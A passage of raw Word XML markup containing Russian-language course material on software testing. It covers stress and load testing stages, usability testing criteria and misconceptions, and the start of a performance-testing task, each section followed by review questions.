      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Стресс тестирование (Stress Testing) имеет своей целью проверить возвращается ли система после запредельной нагрузки (и как скоро) к нормальному режиму, также целями стрессового тестирования могут быть проверки поведения системы в случаях когда, один из серверов приложения в пуле переста</w:t>
      </w:r>
      <w:r w:rsidR="00776B59" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>е</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>т работать, аварийно изменилась аппаратная конфигурации сервера базы данных и т.д. Отметим также, что при стрессовом тестировании проверяется не производительность системы, а е</w:t>
      </w:r>
      <w:r w:rsidR="00776B59" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>е</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> способность к регенерации после сверх нагрузк</w:t>
      </w:r>
      <w:r w:rsidR="008634D0" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>и</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00434EE5" w:rsidRPr="00617AC0" w:rsidRDefault="00434EE5" w:rsidP="00434EE5">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Главное все-таки в том, чтобы понимать цели того или иного тестирования и постараться их достигнуть.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00434EE5" w:rsidRPr="00617AC0" w:rsidRDefault="00434EE5" w:rsidP="00434EE5">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Этапы проведения нагрузочного тестирования</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00434EE5" w:rsidRPr="00617AC0" w:rsidRDefault="00434EE5" w:rsidP="00434EE5">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Рассматривая этапы проведения нагрузочного тестирования имеются обязательные обязательные:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00434EE5" w:rsidRPr="00617AC0" w:rsidRDefault="00434EE5" w:rsidP="00434EE5">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Анализ требований и сбор информации о тестируемой системе</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00434EE5" w:rsidRPr="00617AC0" w:rsidRDefault="00434EE5" w:rsidP="00434EE5">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Конфигурация тестового стенда для нагрузочного тестирования</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00434EE5" w:rsidRPr="00617AC0" w:rsidRDefault="00434EE5" w:rsidP="00434EE5">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Разработка модели нагрузки</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00434EE5" w:rsidRPr="00617AC0" w:rsidRDefault="00434EE5" w:rsidP="00434EE5">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Выбор инструмента для нагрузочного тестирования</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00434EE5" w:rsidRPr="00617AC0" w:rsidRDefault="00434EE5" w:rsidP="00434EE5">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Создание и отладка тестовых скриптов</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00434EE5" w:rsidRPr="00617AC0" w:rsidRDefault="00434EE5" w:rsidP="00434EE5">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Проведение тестирования</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00434EE5" w:rsidRPr="00617AC0" w:rsidRDefault="00434EE5" w:rsidP="00434EE5">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Анализ результатов</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00434EE5" w:rsidRPr="00617AC0" w:rsidRDefault="00434EE5" w:rsidP="00434EE5">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Подготовка, отправка и публикация отчета по проведенному нагрузочному тестированию</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00434EE5" w:rsidRPr="00617AC0" w:rsidRDefault="00434EE5" w:rsidP="00434EE5">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Перечень контрольных вопросов:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00434EE5" w:rsidRPr="00617AC0" w:rsidRDefault="00434EE5" w:rsidP="00434EE5">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>1. Что такое нагрузочное тестирование?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00434EE5" w:rsidRPr="00617AC0" w:rsidRDefault="00434EE5" w:rsidP="00434EE5">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>2. Какие цели преследует нагрузочное тестирование?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00434EE5" w:rsidRPr="00617AC0" w:rsidRDefault="00434EE5" w:rsidP="00434EE5">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>3. Что такое автоматическое тестирование?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D9588A" w:rsidRPr="00617AC0" w:rsidRDefault="00D9588A" w:rsidP="00D9588A">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Задание 2. Тестирование удобства использования и эксплуатации программного обеспечения отраслевой направленности.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D9588A" w:rsidRPr="00617AC0" w:rsidRDefault="00D9588A" w:rsidP="00D9588A">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Краткое теоретическое обоснование:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D9588A" w:rsidRPr="00617AC0" w:rsidRDefault="00D9588A" w:rsidP="00D9588A">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Тестирование удобства пользования или Usability Testing</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D9588A" w:rsidRPr="00617AC0" w:rsidRDefault="00D9588A" w:rsidP="00D9588A">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Иногда мы сталкиваемся с непонятными, нелогичными приложениями, многие функции и способы использования которых часто не очевидны. После такой работы редко возникает желание использовать приложение снова, и мы ищем более удобные аналоги. Для того чтобы приложение было популярным, ему мало быть функциональным – оно должно быть еще и удобным. Если задуматься, интуитивно понятные приложения экономят нервы пользователям и затраты работодателя на обучение. А значит они более конкурентоспособные! Поэтому тестирование удобства использования, о котором пойдет речь далее является неотъемлемой частью тестирования любых массовых продуктов.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D9588A" w:rsidRPr="00617AC0" w:rsidRDefault="00D9588A" w:rsidP="00D9588A">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Тестирование удобства пользования - это метод тестирования, направленный на установление степени удобства использования, обучаемости, понятности и привлекательности для пользователей разрабатываемого продукта в контексте заданных условий. [ISO 9126]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D9588A" w:rsidRPr="00617AC0" w:rsidRDefault="00D9588A" w:rsidP="00D9588A">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Тестирование удобства пользования дает оценку уровня удобства использования приложения по следующим пунктам:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D9588A" w:rsidRPr="00617AC0" w:rsidRDefault="00D9588A" w:rsidP="00D9588A">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>производительность, эффективность (efficiency) - сколько времени и шагов понадобится пользователю для завершения основных задач приложения, например, размещение новости, регистрации, покупка и т.д.? (меньше - лучше)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D9588A" w:rsidRPr="00617AC0" w:rsidRDefault="00D9588A" w:rsidP="00D9588A">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>правильность (accuracy) - сколько ошибок сделал пользователь во время работы с приложением? (меньше - лучше)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D9588A" w:rsidRPr="00617AC0" w:rsidRDefault="00D9588A" w:rsidP="00D9588A">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>активизация в памяти (recall) – как много пользователь помнит о работе приложения после приостановки работы с ним на длительный период времени? (повторное выполнение операций после перерыва должно проходить быстрее чем у нового пользователя)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D9588A" w:rsidRPr="00617AC0" w:rsidRDefault="00D9588A" w:rsidP="00D9588A">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>эмоциональная реакция (emotional response) – как пользователь себя чувствует после завершения задачи - растерян, испытал стресс? Порекомендует ли пользователь систему своим друзьям? (положительная реакция - лучше)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D9588A" w:rsidRPr="00617AC0" w:rsidRDefault="00D9588A" w:rsidP="00D9588A">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Уровни проведения</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D9588A" w:rsidRPr="00617AC0" w:rsidRDefault="00D9588A" w:rsidP="00D9588A">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Проверка удобства использования может проводиться как по отношению к готовому продукту, посредством тестирования черного ящика (black box testing), так и к интерфейсам приложения (API), используемым при разработке - тестирование белого ящика (white box testing). В этом случае проверяется удобство использования внутренних объектов, классов, методов и переменных, а также рассматривается удобство изменения, расширения системы и интеграции ее с другими модулями или системами. Использование удобных интерфейсов (API) может улучшить качество, увеличить скорость написания и поддержки разрабатываемого кода, и как следствие улучшить качество продукта в целом.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D9588A" w:rsidRPr="00617AC0" w:rsidRDefault="00D9588A" w:rsidP="00D9588A">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Отсюда становится очевидно, что тестирование удобства пользования может производиться на разных уровнях разработки программного обеспечения: модульном, </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>интеграционном, системном и приемочном. При этом оно целиком и полностью будет зависит от того, кто будет использовать приложение на выделенном конкретном уровне - разработчик, бизнес пользователь системы и т.д.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D9588A" w:rsidRPr="00617AC0" w:rsidRDefault="00D9588A" w:rsidP="00D9588A">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Советы по улучшению удобства пользования</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D9588A" w:rsidRPr="00617AC0" w:rsidRDefault="00D9588A" w:rsidP="00D9588A">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Для дизайна удобных приложений полезно следовать принципам «пока-йока» или fail-safe. У нас это более известно как «защита от дурака». Простой пример, если поле требует цифровое значение, логично ограничить пользователю диапазон ввода только цифрами – будет меньше случайных ошибок.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D9588A" w:rsidRPr="00617AC0" w:rsidRDefault="00D9588A" w:rsidP="00D9588A">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Для повышения юзабилити существующих приложений можно использовать цикл Демминга Plan-Do-Check-Act, собирая отзывы о работе и дизайне приложения у существующих пользователей, и, в соответствии с их замечаниями, планируя и проводя улучшения.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D9588A" w:rsidRPr="00617AC0" w:rsidRDefault="00D9588A" w:rsidP="00D9588A">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Заблуждения о тестировании удобства пользования</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D9588A" w:rsidRPr="00617AC0" w:rsidRDefault="00D9588A" w:rsidP="00D9588A">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>1. Тестирование пользовательского интерфейса = Тестирование удобства пользования</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D9588A" w:rsidRPr="00617AC0" w:rsidRDefault="00D9588A" w:rsidP="00D9588A">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Тестирование удобства пользования не имеет ничего общего с тестированием функциональности пользовательского интерфейса, оно лишь проводится на пользовательском интерфейсе равно как и на многих других возможных компонентах продукта. При этом тип тестирования и тесткейсы будут совсем другие, так как речь может идти об удобстве использования не визуальных компонентов (если таковые имеются) или процессе администрирования, например, распределенного клиент-серверного продукта и т.д.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D9588A" w:rsidRPr="00617AC0" w:rsidRDefault="00D9588A" w:rsidP="00D9588A">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>2. Тестирование удобства пользования можно провести без участия эксперта</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D9588A" w:rsidRPr="00617AC0" w:rsidRDefault="00D9588A" w:rsidP="00D9588A">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Не всегда человек не разбирающийся в предметной области способен провести его самостоятельно. Представьте, что тестировщику нужно протестировать удобство пользования стратегического бомбардировщика. Ему придется проверить основные функции: удобство ведения боя, навигации, пилотирования, обслуживания, наземной транспортировки и т.д. Очевидно, что без привлечения эксперта это будет весьма проблематично, и можно даже сказать, что невозможно.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D9588A" w:rsidRPr="00617AC0" w:rsidRDefault="00D9588A" w:rsidP="00D9588A">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Перечень контрольных вопросов:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D9588A" w:rsidRPr="00617AC0" w:rsidRDefault="00D9588A" w:rsidP="00D9588A">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>1. Что такое юзабилити-тестирование?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D9588A" w:rsidRPr="00617AC0" w:rsidRDefault="00D9588A" w:rsidP="00D9588A">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>2. Какие цели юзабилити-тестирование?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D9588A" w:rsidRPr="00617AC0" w:rsidRDefault="00D9588A" w:rsidP="00D9588A">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>3. В чем состоит роль эксперта при таком тестировании?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009256B4" w:rsidRPr="00617AC0" w:rsidRDefault="00D9588A" w:rsidP="009256B4">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Задание</w:t>
      </w:r>
      <w:r w:rsidR="009256B4" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> 3.</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="009256B4" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Тестирование производительности программного обеспечения отраслевой направленности.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009256B4" w:rsidRPr="00617AC0" w:rsidRDefault="009256B4" w:rsidP="009256B4">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Краткое теоретическое обоснование:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009256B4" w:rsidRPr="00617AC0" w:rsidRDefault="009256B4" w:rsidP="009256B4">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Нагрузочное тестирование</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009256B4" w:rsidRPr="00617AC0" w:rsidRDefault="009256B4" w:rsidP="009256B4">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Современное программное обеспечение просто обязано бесперебойно работать под колоссальными нагрузками. Любого рода проблемы, связанные с плохой производительностью, могут стать причиной отказа клиентов от использования вашего ПО. В связи с этим, проведение качественного нагрузочного тестирования должно стать обязательным, для обеспечения стабильности работы ваших приложений.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009256B4" w:rsidRPr="00617AC0" w:rsidRDefault="009256B4" w:rsidP="009256B4">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Теперь давайте ответим на вопрос: "Что же такое нагрузочное тестирование?", и постараемся более подробно описать процесс проведения нагрузочного тестирования.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009256B4" w:rsidRPr="00617AC0" w:rsidRDefault="009256B4" w:rsidP="009256B4">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Нагрузочное тестирование (Load Testing) или тестирование производительности (Performance Testing) - это автоматизированное тестирование, имитирующее работу определенного количества бизнес пользователей на каком-либо общем (разделяемом ими) ресурсе.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009256B4" w:rsidRPr="00617AC0" w:rsidRDefault="009256B4" w:rsidP="009256B4">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Начиная работу в области нагрузочного тестирования, следует четко понимать, что это не просто запись и прогон (Record and Playback) скриптов, а более сложный процесс:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009256B4" w:rsidRPr="00617AC0" w:rsidRDefault="009256B4" w:rsidP="009256B4">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Во-первых, нагрузочное тестирование - это серьезная исследовательская и аналитическая работа</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009256B4" w:rsidRPr="00617AC0" w:rsidRDefault="009256B4" w:rsidP="009256B4">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Во-вторых - это реальное автоматизированное тестирование, требующее серьезных навыков программирования, а также знания сетевых протоколов и различных серверов приложений и баз данных</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009256B4" w:rsidRPr="00617AC0" w:rsidRDefault="009256B4" w:rsidP="009256B4">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>В-третьих - существуют разные виды нагрузочного тестирования, ставящие перед собой разные цели</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009256B4" w:rsidRPr="00617AC0" w:rsidRDefault="009256B4" w:rsidP="009256B4">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Цели нагрузочного тестирования</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009256B4" w:rsidRPr="00617AC0" w:rsidRDefault="009256B4" w:rsidP="009256B4">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Основными целями нагрузочного тестирования являются:</w:t>
      </w:r>
    </w:p>
